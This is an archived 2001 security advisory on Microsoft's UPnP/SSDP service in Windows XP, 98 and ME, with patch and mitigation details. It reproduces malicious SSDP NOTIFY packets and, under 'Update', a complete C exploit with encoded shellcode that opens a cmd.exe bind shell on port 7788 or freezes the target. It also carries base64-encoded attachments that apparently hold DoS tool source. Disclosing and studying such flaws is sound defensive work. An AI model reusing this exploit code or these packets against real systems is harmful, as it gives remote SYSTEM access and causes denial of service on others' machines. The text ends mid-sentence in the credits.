21th Dec 2001 [SBWID-4949]
COMMAND
UPNP remote vulnerabilities
SYSTEMS AFFECTED
Microsoft Windows XP (All default systems)
Microsoft Windows 98 (Certain configurations)
Microsoft Windows 98SE (Certain configurations)
Microsoft Windows ME (Certain configurations)
PROBLEM
Eeye team (http://www.eeye.com) found three vulnerabilities in UPN
(Universal Plug and Play) Service which can be used to detect and
integrate with UPNP aware devices : A remotely exploitable buffer
overflow to gain SYSTEM level access to any default installation of
Windows XP, a Denial of Service (DoS) attack, and a Distributed Denial
of Service (DDoS) attack.
Description:
============
Windows XP ships by default with a UPNP (Universal Plug and Play)
Service which can be used to detect and integrate with UPNP aware
devices. Windows ME does not ship by default with the UPNP service,
however some OEM versions do provide the UPNP service by default. Also
its possible to install the Windows XP Internet Connection Sharing on
top of Windows 98, therefore making it vulnerable.
\"UPNP architecture offers pervasive peer-to-peer network connectivity
of PCs of all form factors, intelligent appliances, and wireless
devices. UPNP architecture leverages TCP/IP and the Web to enable
seamless proximity networking in addition to control and data transfer
among networked devices in the home, office, and everywhere in
between.\" as described on upnp.org.
We believe that there are several issues with the UPNP protocol itself.
However these more generic issues are out of the scope of this
advisory. Expect a detailed paper to be released from eEye within the
coming weeks.
This advisory covers three vulnerabilities within Microsoft\'s UPNP
implementation. A remotely exploitable buffer overflow to gain SYSTEM
level access to any default installation of Windows XP, a Denial of
Service (DoS) attack, and a Distributed Denial of Service (DDoS)
attack.
The SYSTEM Remote exploit
==========================
The first vulnerability, within Microsoft\'s implementation of the UPNP
protocol, can result in an attacker gaining remote SYSTEM level access
to any default installation of Windows XP. SYSTEM is the highest level
of access within Windows XP.
During testing of the UPNP service, we discovered that by sending
malformed advertisements at various speeds we could cause access
violations on the target machine. Most of these were due to pointers
being overwritten. The following describes one instance.
Example Session:
NOTIFY * HTTP/1.1
HOST: 239.255.255.250:1900
CACHE-CONTROL: max-age=10
LOCATION: http://IPADDRESS:PORT/<buffer>.xml
NT: urn:schemas-upnp-org:device:InternetGatewayDevice:1
NTS: ssdp:alive
SERVER: EEYE/2001 UPnP/1.0 product/1.1
USN: uuid:EEYE
If a buffer is incremented in the protocol, port, and uri fields of the
Location URL and send sessions with 10,000 microsecond intervals,
access violations will begin to be observed. In one situation, The EAX
and ECX registers will contain addresses that are pulled from memory
that was overwritten and the svchost.exe process will access an invalid
memory address at a \"mov\" instruction. It throws and access violation
due to the fact that the destination address is an overwritten pointer,
and there\'s nothing interesting at 0x41414141.
During our testing we found that there were multiple points of
exploitation. In our testing we found instances of stack overflows and
heap overflows, both of which were exploitable. In the case of the heap
overflow we saw pointers being overwritten for both buffers and
functions.
The SSDP service also listens on Multicast and Broadcast addresses.
Therefore gaining SYSTEM access to an entire network of XP machines is
possible with only one anonymous UDP SSDP attack session.
The DoS and DDoS
================
UPNP consists of multiple protocols, one of which being the Simple
Service Discovery Protocol (SSDP). When a UPNP enabled device is
installed on a network, whether it be a computer, network device, or
even a household appliance, it sends out an advertisement to notify
control points of its existence. On a default XP installation, no
support is added for device control as it would be the case in an
installation of UPNP from \"Network Services\".
Although Microsoft added default support for an
\"InternetGatewayDevice.\" if a sniffer is run on a network with XP, XP
can be observed searching for this device as XP is loading. This
support was added to aid leading network hardware manufactures in
making UPnP enabled \"gateway devices\".
By sending a malicious spoofed UDP packet containing an SSDP
advertisement, an attacker can force the XP/ME client to connect back
to a specified IP address and pass on a specified HTTP/HTTPS request.
An example session:
NOTIFY * HTTP/1.1
HOST: 239.255.255.250:1900
CACHE-CONTROL: max-age=1
LOCATION: URL
NT: urn: schemas-upnp-org:device:InternetGatewayDevice:1
NTS: ssdp:alive
SERVER: EEYE/2001 UPnP/1.0 PASSITON/1.1
USN: uuid:EEYE
The above packet data needs to be sent as a UDP packet to port 1900 of
the XP/ME machine.
When the XP machine receives this request, it will interpret the URL
following the LOCATION header entity. With no sanitizing of the URL it
is passed on to the functions in the Windows Internet Services API. The
string is broken down and the new session is created.
For example:
LOCATION: http://xptest.example.com:19/himom.html
A malicious attacker could specify a chargen service on a remote
machine causing the XP client to connect and get caught in a tight
read/malloc loop. Doing this will throw the machine into an unstable
state where CPU utilization is at %100 and memory is being allocated to
the point that it is totally consumed. This basically makes the remote
XP system completely unusable and requires a physical power off
shutdown.
Attackers could also use this exploit to control other XP machine\'s,
forcing such machines to perform Unicode attacks, double decode, or
random CGI exploiting. Due to the insecure nature of UDP an attacker
can exploit security holes on a web server using UPNP with almost total
anonymity.
One of the bigger problems, and why this can become a DDoS attack, is
that this SSDP announcement can be sent to broadcast addresses and
multicast. It is therefore possible to send one UDP packet causing all
XP machines on the target network to be navigated to the URL of choice,
performing an attack of choice.
Also since parts of the UPNP service are implemented as UDP (in our
opinion, a bad idea), it makes all of these attacks completely
untraceable.
Update
======
Exploit :
/*
* WinME/XP UPNP dos & overflow
*
* Run: ./XPloit host <option>
*
* Windows run the \"Universal Plug and Play technology\" service
* at port 5000. In the future this will allow for seemless
* connectivity of various devices such as a printer.
* This service have a DoS and a buffer overflow I exploit here.
*
* PD: the -e option spawns a cmd.exe shell on port 7788 coded by isno
*
* Author: hamada alborno
* Email: webmasta100@hotmail.com
* Webpage: http://www.a2z-net.net
*/
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <errno.h>
#include <string.h>
#include <netdb.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <sys/socket.h>
#include <sys/wait.h>
#include <unistd.h>
#include <fcntl.h>
#define MAX 10000
#define PORT 5000
#define FREEZE 512
#define NOP 0x43 //inc ebx, instead of 0x90
/***************************************************************************/
int main(int argc,char *argv[])
{
int sockfd[MAX];
char sendXP[]=\"XP\";
char jmpcode[281], execode[840],request[2048];
char *send_buffer;
int num_socks;
int bindport;
int i;
int port;
unsigned char shellcode[] =
\"\\x90\\xeb\\x03\\x5d\\xeb\\x05\\xe8\\xf8\\xff\\xff\\xff\\x83\\xc5\\x15\\x90\\x90\"
\"\\x90\\x8b\\xc5\\x33\\xc9\\x66\\xb9\\x10\\x03\\x50\\x80\\x30\\x97\\x40\\xe2\\xfa\"
\"\\x7e\\x8e\\x95\\x97\\x97\\xcd\\x1c\\x4d\\x14\\x7c\\x90\\xfd\\x68\\xc4\\xf3\\x36\"
\"\\x97\\x97\\x97\\x97\\xc7\\xf3\\x1e\\xb2\\x97\\x97\\x97\\x97\\xa4\\x4c\\x2c\\x97\"
\"\\x97\\x77\\xe0\\x7f\\x4b\\x96\\x97\\x97\\x16\\x6c\\x97\\x97\\x68\\x28\\x98\\x14\"
\"\\x59\\x96\\x97\\x97\\x16\\x54\\x97\\x97\\x96\\x97\\xf1\\x16\\xac\\xda\\xcd\\xe2\"
\"\\x70\\xa4\\x57\\x1c\\xd4\\xab\\x94\\x54\\xf1\\x16\\xaf\\xc7\\xd2\\xe2\\x4e\\x14\"
\"\\x57\\xef\\x1c\\xa7\\x94\\x64\\x1c\\xd9\\x9b\\x94\\x5c\\x16\\xae\\xdc\\xd2\\xc5\"
\"\\xd9\\xe2\\x52\\x16\\xee\\x93\\xd2\\xdb\\xa4\\xa5\\xe2\\x2b\\xa4\\x68\\x1c\\xd1\"
\"\\xb7\\x94\\x54\\x1c\\x5c\\x94\\x9f\\x16\\xae\\xd0\\xf2\\xe3\\xc7\\xe2\\x9e\\x16\"
\"\\xee\\x93\\xe5\\xf8\\xf4\\xd6\\xe3\\x91\\xd0\\x14\\x57\\x93\\x7c\\x72\\x94\\x68\"
\"\\x94\\x6c\\x1c\\xc1\\xb3\\x94\\x6d\\xa4\\x45\\xf1\\x1c\\x80\\x1c\\x6d\\x1c\\xd1\"
\"\\x87\\xdf\\x94\\x6f\\xa4\\x5e\\x1c\\x58\\x94\\x5e\\x94\\x5e\\x94\\xd9\\x8b\\x94\"
\"\\x5c\\x1c\\xae\\x94\\x6c\\x7e\\xfe\\x96\\x97\\x97\\xc9\\x10\\x60\\x1c\\x40\\xa4\"
\"\\x57\\x60\\x47\\x1c\\x5f\\x65\\x38\\x1e\\xa5\\x1a\\xd5\\x9f\\xc5\\xc7\\xc4\\x68\"
\"\\x85\\xcd\\x1e\\xd5\\x93\\x1a\\xe5\\x82\\xc5\\xc1\\x68\\xc5\\x93\\xcd\\xa4\\x57\"
\"\\x3b\\x13\\x57\\xe2\\x6e\\xa4\\x5e\\x1d\\x99\\x13\\x5e\\xe3\\x9e\\xc5\\xc1\\xc4\"
\"\\x68\\x85\\xcd\\x3c\\x75\\x7f\\xd1\\xc5\\xc1\\x68\\xc5\\x93\\xcd\\x1c\\x4f\\xa4\"
\"\\x57\\x3b\\x13\\x57\\xe2\\x6e\\xa4\\x5e\\x1d\\x99\\x17\\x6e\\x95\\xe3\\x9e\\xc5\"
\"\\xc1\\xc4\\x68\\x85\\xcd\\x3c\\x75\\x70\\xa4\\x57\\xc7\\xd7\\xc7\\xd7\\xc7\\x68\"
\"\\xc0\\x7f\\x04\\xfd\\x87\\xc1\\xc4\\x68\\xc0\\x7b\\xfd\\x95\\xc4\\x68\\xc0\\x67\"
\"\\xa4\\x57\\xc0\\xc7\\x27\\x9b\\x3c\\xcf\\x3c\\xd7\\x3c\\xc8\\xdf\\xc7\\xc0\\xc1\"
\"\\x3a\\xc1\\x68\\xc0\\x57\\xdf\\xc7\\xc0\\x3a\\xc1\\x3a\\xc1\\x68\\xc0\\x57\\xdf\"
\"\\x27\\xd3\\x1e\\x90\\xc0\\x68\\xc0\\x53\\xa4\\x57\\x1c\\xd1\\x63\\x1e\\xd0\\xab\"
\"\\x1e\\xd0\\xd7\\x1c\\x91\\x1e\\xd0\\xaf\\xa4\\x57\\xf1\\x2f\\x96\\x96\\x1e\\xd0\"
\"\\xbb\\xc0\\xc0\\xa4\\x57\\xc7\\xc7\\xc7\\xd7\\xc7\\xdf\\xc7\\xc7\\x3a\\xc1\\xa4\"
\"\\x57\\xc7\\x68\\xc0\\x5f\\x68\\xe1\\x67\\x68\\xc0\\x5b\\x68\\xe1\\x6b\\x68\\xc0\"
\"\\x5b\\xdf\\xc7\\xc7\\xc4\\x68\\xc0\\x63\\x1c\\x4f\\xa4\\x57\\x23\\x93\\xc7\\x56\"
\"\\x7f\\x93\\xc7\\x68\\xc0\\x43\\x1c\\x67\\xa4\\x57\\x1c\\x5f\\x22\\x93\\xc7\\xc7\"
\"\\xc0\\xc6\\xc1\\x68\\xe0\\x3f\\x68\\xc0\\x47\\x14\\xa8\\x96\\xeb\\xb5\\xa4\\x57\"
\"\\xc7\\xc0\\x68\\xa0\\xc1\\x68\\xe0\\x3f\\x68\\xc0\\x4b\\x9c\\x57\\xe3\\xb8\\xa4\"
\"\\x57\\xc7\\x68\\xa0\\xc1\\xc4\\x68\\xc0\\x6f\\xfd\\xc7\\x68\\xc0\\x77\\x7c\\x5f\"
\"\\xa4\\x57\\xc7\\x23\\x93\\xc7\\xc1\\xc4\\x68\\xc0\\x6b\\xc0\\xa4\\x5e\\xc6\\xc7\"
\"\\xc1\\x68\\xe0\\x3b\\x68\\xc0\\x4f\\xfd\\xc7\\x68\\xc0\\x77\\x7c\\x3d\\xc7\\x68\"
\"\\xc0\\x73\\x7c\\x69\\xcf\\xc7\\x1e\\xd5\\x65\\x54\\x1c\\xd3\\xb3\\x9b\\x92\\x2f\"
\"\\x97\\x97\\x97\\x50\\x97\\xef\\xc1\\xa3\\x85\\xa4\\x57\\x54\\x7c\\x7b\\x7f\\x75\"
\"\\x6a\\x68\\x68\\x7f\\x05\\x69\\x68\\x68\\xdc\\xc1\\x70\\xe0\\xb4\\x17\\x70\\xe0\"
\"\\xdb\\xf8\\xf6\\xf3\\xdb\\xfe\\xf5\\xe5\\xf6\\xe5\\xee\\xd6\\x97\\xdc\\xd2\\xc5\"
\"\\xd9\\xd2\\xdb\\xa4\\xa5\\x97\\xd4\\xe5\\xf2\\xf6\\xe3\\xf2\\xc7\\xfe\\xe7\\xf2\"
\"\\x97\\xd0\\xf2\\xe3\\xc4\\xe3\\xf6\\xe5\\xe3\\xe2\\xe7\\xde\\xf9\\xf1\\xf8\\xd6\"
\"\\x97\\xd4\\xe5\\xf2\\xf6\\xe3\\xf2\\xc7\\xe5\\xf8\\xf4\\xf2\\xe4\\xe4\\xd6\\x97\"
\"\\xd4\\xfb\\xf8\\xe4\\xf2\\xdf\\xf6\\xf9\\xf3\\xfb\\xf2\\x97\\xc7\\xf2\\xf2\\xfc\"
\"\\xd9\\xf6\\xfa\\xf2\\xf3\\xc7\\xfe\\xe7\\xf2\\x97\\xd0\\xfb\\xf8\\xf5\\xf6\\xfb\"
\"\\xd6\\xfb\\xfb\\xf8\\xf4\\x97\\xc0\\xe5\\xfe\\xe3\\xf2\\xd1\\xfe\\xfb\\xf2\\x97\"
\"\\xc5\\xf2\\xf6\\xf3\\xd1\\xfe\\xfb\\xf2\\x97\\xc4\\xfb\\xf2\\xf2\\xe7\\x97\\xd2\"
\"\\xef\\xfe\\xe3\\xc7\\xe5\\xf8\\xf4\\xf2\\xe4\\xe4\\x97\\x97\\xc0\\xc4\\xd8\\xd4\"
\"\\xdc\\xa4\\xa5\\x97\\xe4\\xf8\\xf4\\xfc\\xf2\\xe3\\x97\\xf5\\xfe\\xf9\\xf3\\x97\"
\"\\xfb\\xfe\\xe4\\xe3\\xf2\\xf9\\x97\\xf6\\xf4\\xf4\\xf2\\xe7\\xe3\\x97\\xe4\\xf2\"
\"\\xf9\\xf3\\x97\\xe5\\xf2\\xf4\\xe1\\x97\\x95\\x97\\x89\\xfb\\x97\\x97\\x97\\x97\"
\"\\x97\\x97\\x97\\x97\\x97\\x97\\x97\\x97\\xf4\\xfa\\xf3\\xb9\\xf2\\xef\\xf2\\x97\"
\"\\x68\\x68\\x68\\x68\";
struct hostent *he;
struct sockaddr_in their_addr;
if(argc!=3)
{
fprintf(stderr,\"usage:%s <hostname> <command>\\n\",argv[0]);
fprintf(stderr,\"-f freeze the machine.\\n\");
fprintf(stderr,\"-e exploit.\\n\");
exit(1);
}
if(strstr(argv[2],\"-f\")) {
num_socks=FREEZE;
send_buffer=sendXP;
}
if(strstr(argv[2],\"-e\")) {
num_socks=1;
send_buffer=request;
bindport^=0x9797;
shellcode[778]= (bindport) & 0xff;
shellcode[779]= (bindport >> 8) & 0xff;
for(i = 0; i < 268; i++)
jmpcode[i] = (char)NOP;
jmpcode[268] = (char)0x4d;
jmpcode[269] = (char)0x3f;
jmpcode[270] = (char)0xe3;
jmpcode[271] = (char)0x77;
jmpcode[272] = (char)0x90;
jmpcode[273] = (char)0x90;
jmpcode[274] = (char)0x90;
jmpcode[275] = (char)0x90;
//jmp [ebx+0x64], jump to execute shellcode
jmpcode[276] = (char)0xff;
jmpcode[277] = (char)0x63;
jmpcode[278] = (char)0x64;
jmpcode[279] = (char)0x90;
jmpcode[280] = (char)0x00;
for(i = 0; i < 32; i++)
execode[i] = (char)NOP;
execode[32]=(char)0x00;
strcat(execode, shellcode);
snprintf(request, 2048, \"%s%s\\r\\n\\r\\n\", jmpcode, execode);
}
if((he=gethostbyname(argv[1]))==NULL)
{
perror(\"gethostbyname\");
exit(1);
}
/***************************************************************************/
for(i=0; i<num_socks;i++)
if( (sockfd[i]=socket(AF_INET,SOCK_STREAM,0)) == -1) {
perror(\"socket\"); exit(1);
}
their_addr.sin_family=AF_INET;
their_addr.sin_port=htons(PORT);
their_addr.sin_addr=*((struct in_addr*)he->h_addr);
bzero(&(their_addr.sin_zero),8);
for(i=0; i<num_socks;i++)
if( connect(sockfd[i],(struct sockaddr*)&their_addr, sizeof(struct
sockaddr))==-1)
{
perror(\"connect\");
exit(1);
}
for(i=0; i<num_socks;i++)
if(send(sockfd[i],send_buffer,strlen(send_buffer),0) ==-1)
{
perror(\"send\");
exit(0);
}
for(i=0; i<num_socks;i++)
close(sockfd[i]);
return 0;
}
DoS exploit by Gabriel Maggiotti (unchecked)
------_=_NextPart_001_01C19915.7D29A2BD
Content-Type: application/octet-stream;
name=\"chargen.c\"
Content-Transfer-Encoding: base64
Content-Description: chargen.c
Content-Disposition: attachment;
filename=\"chargen.c\"
PCFET0NUWVBFIEhUTUwgUFVCTElDICItLy9XM0MvL0RURCBIVE1MIDQuMCBUcmFuc2l0aW9uYWwv
L0VOIj4NCjwhLS0gc2F2ZWQgZnJvbSB1cmw9KDAwMzQpaHR0cDovL3FiMHgubmV0L2V4cGxvaXRz
L2NoYXJnZW4uYyAtLT4NCjxIVE1MPjxIRUFEPg0KPE1FVEEgY29udGVudD0idGV4dC9odG1sOyBj
aGFyc2V0PXdpbmRvd3MtMTI1MiIgaHR0cC1lcXVpdj1Db250ZW50LVR5cGU+DQo8TUVUQSBjb250
ZW50PSJNU0hUTUwgNS4wMC4yOTE5LjYzMDciIG5hbWU9R0VORVJBVE9SPjwvSEVBRD4NCjxCT0RZ
PjxYTVA+LyoNCiAqIENoYXJnZW4gU2VydmVyDQogKg0KICogUnVuOiAuL2NoYXJnZW4gPGNoYXJn
ZW5fcG9ydD4NCiAqDQogKg0KICogQXV0aG9yOiAgICAgIEdhYnJpZWwgTWFnZ2lvdHRpLCBGZXJu
YW5kbyBPdWJp8WENCiAqIEVtYWlsOiAgICAgICBnbWFnZ2lvdEBjaXVkYWQuY29tLmFyLCBmb3Vi
aW5hQHFiMHgubmV0DQogKiBXZWJwYWdlOiAgICAgaHR0cDovL3FiMHgubmV0DQogKi8NCg0KI2lu
Y2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3RkbGliLmg+DQojaW5jbHVkZSA8ZXJybm8uaD4N
CiNpbmNsdWRlIDxzdHJpbmcuaD4NCiNpbmNsdWRlIDxzeXMvdHlwZXMuaD4NCiNpbmNsdWRlIDxu
ZXRpbmV0L2luLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPHN5cy93YWl0
Lmg+DQojaW5jbHVkZSA8bWFsbG9jLmg+DQoNCiNkZWZpbmUgQkFDS0xPRwk1DQojZGVmaW5lIE1B
WAk1MDANCg0KaW50DQptYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pDQp7DQppbnQgdmlzaXQ9
MTsNCmludCBpOw0KaW50IHBvcnQ7DQppbnQgc29ja2ZkOw0KaW50IG5ld2ZkOw0KaW50IG51bWJ5
dGVzOw0KY2hhciBidWZbTUFYXTsNCmNoYXIgZGllZGJ1ZlsxMDI0XTsNCg0KCXN0cnVjdCBzb2Nr
YWRkcl9pbiBteV9hZGRyOw0KCXN0cnVjdCBzb2NrYWRkcl9pbiB0aGVpcl9hZGRyOw0KCWludCBz
aW5fc2l6ZTsNCg0KCWlmKGFyZ2MhPTIpIHsNCgkJZnByaW50ZihzdGRlcnIsInVzYWdlOiAlcyA8
Y2hhcmdlbl9wb3J0PlxuIixhcmd2WzBdKTsNCgkJcmV0dXJuIDE7DQoJfQ0KCXBvcnQ9YXRvaShh
cmd2WzFdKTsNCg0KCWlmKCAoc29ja2ZkPXNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgMCkp
ID09IC0xKQ0KCXsNCgkJcGVycm9yKCJzb2NrZXQiKTsNCgkJZXhpdCgxKTsNCgl9DQoNCglteV9h
ZGRyLnNpbl9mYW1pbHk9QUZfSU5FVDsNCglteV9hZGRyLnNpbl9wb3J0PWh0b25zKHBvcnQpOw0K
CW15X2FkZHIuc2luX2FkZHIuc19hZGRyPWh0b25sKElOQUREUl9BTlkpOw0KCWJ6ZXJvKCAmKG15
X2FkZHIuc2luX3plcm8pLDgpOw0KDQoJaWYoIGJpbmQoc29ja2ZkLCAoc3RydWN0IHNvY2thZGRy
ICopICZteV9hZGRyLFwNCgkJc2l6ZW9mKHN0cnVjdCBzb2NrYWRkcikgKSA9PSAtMSkNCgl7DQoJ
CXBlcnJvcigiYmluZCIpOw0KCQlleGl0KDEpOw0KCX0NCg0KDQoJaWYoIGxpc3Rlbihzb2NrZmQs
IEJBQ0tMT0cpID09IC0xKQ0KCXsNCgkJcGVycm9yKCJsaXN0ZW4iKTsNCgkJZXhpdCgxKTsNCgl9
DQoNCglmb3IoaT0wO2k8MTAyNDtpKyspDQoJCWRpZWRidWZbaV0gPSAncSc7DQoNCgl3aGlsZSgx
KSANCgl7CQ0KCQlzaW5fc2l6ZT1zaXplb2YoIHN0cnVjdCBzb2NrYWRkcl9pbik7DQoJCWlmKCAo
bmV3ZmQ9YWNjZXB0KHNvY2tmZCwoc3RydWN0IHNvY2thZGRyKikmdGhlaXJfYWRkcixcDQoJCQkg
JnNpbl9zaXplKSk9PSAtMSkNCgkJew0KCQkJcGVycm9yKCJhY2NlcHQiKTsNCgkJCWV4aXQoMSk7
DQoJCX0NCgkJcHJpbnRmKCJWaXNpdCBudW1iZXI6ICVkXG4iLHZpc2l0KyspOw0KDQoJCWlmKCFm
b3JrKCkpIA0KCQl7DQoJCQlpbnQgaT0xOw0KCQkJaWYoIChudW1ieXRlcz1yZWN2KG5ld2ZkLGJ1
ZixNQVgsMCkpPT0tMSApIA0KCQkJew0KCQkJCXBlcnJvcigicmVjdiIpOw0KCQkJCWV4aXQoMSk7
DQoJCQl9DQoJDQoJCQlidWZbbnVtYnl0ZXNdPSdcMCc7DQoJCQlwcmludGYoIiVzXG4iLGJ1Zik7
DQoJDQoJCQl3aGlsZSgxKQ0KCQkJew0KCQkJCWlmKHNlbmQobmV3ZmQsZGllZGJ1ZiwxMDI0LDAp
ID09LTEpDQoJCQkJew0KICAgICAgICAJCQkJcGVycm9yKCJzZW5kIik7DQogICAgICAgIAkJCQll
eGl0KDApOw0KCQkJCX0NCgkJCX0NCgkJfQ0KCX0NCmNsb3NlKG5ld2ZkKTsNCn0NCjwvWE1QPjwv
Qk9EWT48L0hUTUw+DQo=
------_=_NextPart_001_01C19915.7D29A2BD
Content-Type: application/octet-stream;
name=\"upnp_udp.c\"
Content-Transfer-Encoding: base64
Content-Description: upnp_udp.c
Content-Disposition: attachment;
filename=\"upnp_udp.c\"
PCFET0NUWVBFIEhUTUwgUFVCTElDICItLy9XM0MvL0RURCBIVE1MIDQuMCBUcmFuc2l0aW9uYWwv
L0VOIj4NCjxIVE1MPjxIRUFEPg0KPE1FVEEgY29udGVudD0idGV4dC9odG1sOyBjaGFyc2V0PXdp
bmRvd3MtMTI1MiIgaHR0cC1lcXVpdj1Db250ZW50LVR5cGU+PC9IRUFEPg0KPEJPRFk+PFhNUD4v
KiANCiAqIFdpbk1FL1hQIFVQTlAgRDBTICANCiAqDQogKiAuL3VwbnBfdWRwIDxyZW1vdGVfaG9z
dG5hbWU+IDxzcG9vZmZlZF9ob3N0PiA8Y2hhcmdlbl9wb3J0Pg0KICoNCiAqIEF1dGhvcnM6ICAg
ICBHYWJyaWVsIE1hZ2dpb3R0aSwgRmVybmFuZG8gT3ViafFhDQogKiBFbWFpbDogICAgICAgZ21h
Z2dpb3RAY2l1ZGFkLmNvbS5hciwgZm91YmluYUBxYjB4Lm5ldA0KICogV2VicGFnZTogICAgIGh0
dHA6Ly9xYjB4Lm5ldA0KICovDQoNCiNpbmNsdWRlIDxzdGRpby5oPg0KI2luY2x1ZGUgPHN0cmlu
Zy5oPg0KI2luY2x1ZGUgPHN0ZGxpYi5oPg0KI2luY2x1ZGUgPGVycm5vLmg+DQojaW5jbHVkZSA8
c3RyaW5nLmg+DQojaW5jbHVkZSA8bmV0ZGIuaD4NCiNpbmNsdWRlIDxzeXMvdHlwZXMuaD4NCiNp
bmNsdWRlIDxuZXRpbmV0L2luLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUg
PHN5cy93YWl0Lmg+DQojaW5jbHVkZSA8dW5pc3RkLmg+DQojaW5jbHVkZSA8ZmNudGwuaD4NCg0K
I2RlZmluZSBNQVgJMTAwMA0KI2RlZmluZSBQT1JUCTE5MDANCg0KDQpjaGFyICpzdHJfcmVwbGFj
ZShjaGFyICpyZXAsIGNoYXIgKm9yaWcsIGNoYXIgKnN0cmluZykNCnsNCmludCBsZW49c3RybGVu
KG9yaWcpOw0KY2hhciBidWZbTUFYXT0iIjsNCmNoYXIgKnB0PXN0cnN0cihzdHJpbmcsb3JpZyk7
DQoNCnN0cm5jcHkoYnVmLHN0cmluZywgcHQtc3RyaW5nICk7DQpzdHJjYXQoYnVmLHJlcCk7DQpz
dHJjYXQoYnVmLHB0K3N0cmxlbihvcmlnKSk7DQpzdHJjcHkoc3RyaW5nLGJ1Zik7DQpyZXR1cm4g
c3RyaW5nOw0KfQ0KDQovKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioq
KioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqLw0KDQppbnQgbWFpbihpbnQgYXJnYyxj
aGFyICphcmd2W10pDQp7DQoJaW50IHNvY2tmZCxpOw0KCWludCBudW1ieXRlczsNCglpbnQgbnVt
X3NvY2tzOw0KCWludCBhZGRyX2xlbjsNCgljaGFyIHJlY2l2ZV9idWZmZXJbTUFYXT0iIjsNCg0K
CWNoYXIgc2VuZF9idWZmZXJbTUFYXT0NCgkiTk9USUZZICogSFRUUC8xLjFcclxuSE9TVDogMjM5
LjI1NS4yNTUuMjUwOjE5MDBcclxuIg0KCSJDQUNIRS1DT05UUk9MOiBtYXgtYWdlPTFcclxuTE9D
QVRJT046IGh0dHA6Ly93d3cuaG9zdC5jb206cG9ydC9cclxuIg0KCSJOVDogdXJuOnNjaGVtYXMt
dXBucC1vcmc6ZGV2aWNlOkludGVybmV0R2F0ZXdheURldmljZToxXHJcbiINCgkiTlRTOiBzc2Rw
OmFsaXZlXHJcblNFUlZFUjogUUIwWC8yMDEgVVBuUC8xLjAgcHJvdWN0LzEuMVxyXG4iDQoJIlVT
TjogdXVpZDpRQjBYXHJcblxyXG5cclxuIjsNCg0KCWNoYXIgKmF1eD1zZW5kX2J1ZmZlcjsNCglz
dHJ1Y3QgaG9zdGVudCAqaGU7DQoJc3RydWN0IHNvY2thZGRyX2luIHRoZWlyX2FkZHI7DQoNCglp
ZihhcmdjIT00KQ0KCXsNCgkJZnByaW50ZihzdGRlcnIsInVzYWdlOiVzIDxyZW1vdGVfaG9zdG5h
bWU+ICJcDQoJCQkiPHNwb29mZmVkX2hvc3Q+IDxjaGFyZ2VuX3BvcnQ+XG4iLGFyZ3ZbMF0pOw0K
CQlleGl0KDEpOw0KCX0NCg0KDQoJYXV4PXN0cl9yZXBsYWNlKGFyZ3ZbMl0sInd3dy5ob3N0LmNv
bSIsc2VuZF9idWZmZXIpOw0KCWF1eD1zdHJfcmVwbGFjZShhcmd2WzNdLCJwb3J0IixzZW5kX2J1
ZmZlcik7DQoNCglpZigoaGU9Z2V0aG9zdGJ5bmFtZShhcmd2WzFdKSk9PU5VTEwpDQoJew0KCQlw
ZXJyb3IoImdldGhvc3RieW5hbWUiKTsNCgkJZXhpdCgxKTsNCgl9DQoNCg0KCWlmKCAoc29ja2Zk
PXNvY2tldChBRl9JTkVULFNPQ0tfREdSQU0sMCkpID09IC0xKSB7DQoJCXBlcnJvcigic29ja2V0
Iik7IGV4aXQoMSk7DQoJfQ0KDQoJdGhlaXJfYWRkci5zaW5fZmFtaWx5PUFGX0lORVQ7DQoJdGhl
aXJfYWRkci5zaW5fcG9ydD1odG9ucyhQT1JUKTsNCgl0aGVpcl9hZGRyLnNpbl9hZGRyPSooKHN0
cnVjdCBpbl9hZGRyKiloZS0+aF9hZGRyKTsNCgliemVybygmKHRoZWlyX2FkZHIuc2luX3plcm8p
LDgpOw0KDQoJaWYoIChudW1ieXRlcz1zZW5kdG8oc29ja2ZkLHNlbmRfYnVmZmVyLHN0cmxlbihz
ZW5kX2J1ZmZlciksMCxcDQoJKHN0cnVjdCBzb2NrYWRkciAqKSZ0aGVpcl9hZGRyLCBzaXplb2Yo
c3RydWN0IHNvY2thZGRyKSkpID09LTEpDQoJew0KCQlwZXJyb3IoInNlbmQiKTsNCgkJZXhpdCgw
KTsNCgl9DQoJY2xvc2Uoc29ja2ZkKTsNCg0KcmV0dXJuIDA7DQp9DQoNCg0KPC9YTVA+PC9CT0RZ
PjwvSFRNTD4NCg==
------_=_NextPart_001_01C19915.7D29A2BD--
SOLUTION
Vendor Status:
Microsoft has released a patch and security bulletin which is located
at:
http://www.microsoft.com/technet/security/bulletin/MS01-059.asp
To verify that the patch has been installed on your system use the
following:
Windows 98 and 98SE:
To verify that the patch has been installed on the machine, select
Start, then Run, then run the QFECheck utility. If the patch is
installed, \"Windows 98 Q314941 Update\" will be listed among the
installed patches. To verify the individual files, use the file
manifest provided in Knowledge Base article Q314941.
Windows ME:
To verify that the patch has been installed on the machine, select
Start, then Run, then run the QFECheck utility. If the patch is
installed, \"Windows Millennium Edition Q314757 Update\" will be listed
among the installed patches. To verify the individual files, use the
file manifest provided in Knowledge Base article Q314757.
Windows XP:
To verify that the patch has been installed on the machine, confirm
that the following registry key has been created on the machine:
HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Updates\\Windows
XP\\SP1\\Q315000. To verify the individual files, use the date/time and
version information provided in the following registry key:
HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Updates\\Windows
XP\\SP1\\Q315000\\Filelist.
The Common Vulnerabilities and Exposures (CVE) project has assigned the
following two ID\'s:
The Buffer Overflow: CAN-2001-0876
The Denial of Service: CAN-2001-0877
This is a candidate for inclusion in the CVE list http://cve.mitre.org,
which standardizes names for security problems.
We would strongly suggest denying all UPNP traffic at your internet
borders as there is really no need to allow UPNP traffic across the
Internet. Also it would be wise to completely turn off the UPNP
service\'s as most users are probably not utilizing them anyways. The
less services running on your machine the safer you will be. The SSDP
Discovery Service and Universal Plug and Play Host service should both
be set to manual load.
Discovery:
Riley Hassell <riley@eeye.com>
With extra help from:
Ryan Permeh - for technical advice and exploitation analysis for those
